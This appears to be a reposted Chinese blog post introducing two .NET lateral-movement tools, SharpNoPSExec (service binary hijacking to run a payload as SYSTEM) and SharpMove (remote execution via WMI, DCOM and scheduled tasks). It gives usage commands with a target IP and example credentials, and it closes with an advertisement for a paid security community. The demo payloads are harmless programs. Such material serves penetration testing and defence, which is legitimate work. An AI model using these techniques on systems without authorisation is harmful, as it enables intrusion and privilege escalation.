分享两个基于.NET下内网横向移动的工具
2023-12-4 08:36:21 Author: dotNet安全矩阵(查看原文) 阅读量:6 收藏

SharpNoPSExec是一款专为内网横向移动设计的工具,原理上是复用一些被禁用或停止的Windows 服务,一旦找到符合条件的服务,SharpNoPSExec 将服务的二进制路径替换为恶意负载,并将其启动。

工具使用

实战中可先建立共享连接,再执行命令:SharpNoPSExec.exe --target=192.168.101.86 --payload="c:\windows\system32\cmd.exe /c notepad",如下图所示

运行后可见记事本notepad.exe进程以系统SYSTEM账户的权限启动

SharpMove是一款用于内网横向移动的工具,工具内部集合了WMIDCOM、任务计划等方式实现远程主机命令执行。

工具使用

实战中使用action参数指定create,在远程主机上创建用于启动进程的WMI,命令如下:

SharpMove.exe action=create computername=PC-20201112PLZR command="C:\windows\system32\winver.exe" amsi=true username=ivan1ee password=123456

这里创建成功后会启动进程PID7052winver.exe,如下图所示

为了更好地应对基于.NET技术栈的风险识别和未知威胁,dotNet安全矩阵星球从创建以来一直聚焦于.NET领域的安全攻防技术,定位于高质量安全攻防星球社区,得到了许多师傅们的支持和信任,通过星球深度连接入圈的师傅们,一起推动.NET安全高质量的向前发展经过运营团队成员商议一致同意给到师傅们最大优惠力度,只需129元就可以加入我们。

星球汇聚了各行业安全攻防技术大咖,并且每日分享.NET安全技术干货以及交流解答各类技术等问题,社区中发布很多高质量的.NET安全资源,可以说市面上很少见,都是干货。其中主题包括.NET Tricks、漏洞分析、内存马、代码审计、预编译、反序列化、webshell免杀、命令执行、C#工具库等等,后续还会倾力打造专刊、视频等配套学习资源,循序渐进的方式引导加深安全攻防技术提高以及岗位内推等等服务。


文章来源: http://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247489603&idx=1&sn=0bc7491d4f0f14dde5ff23edce6cfdf7&chksm=fa5ab6aecd2d3fb8d84d3b2978fdfe857692f82cf2d50166b7b7f75351b2dbee5b8e06bd8794&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh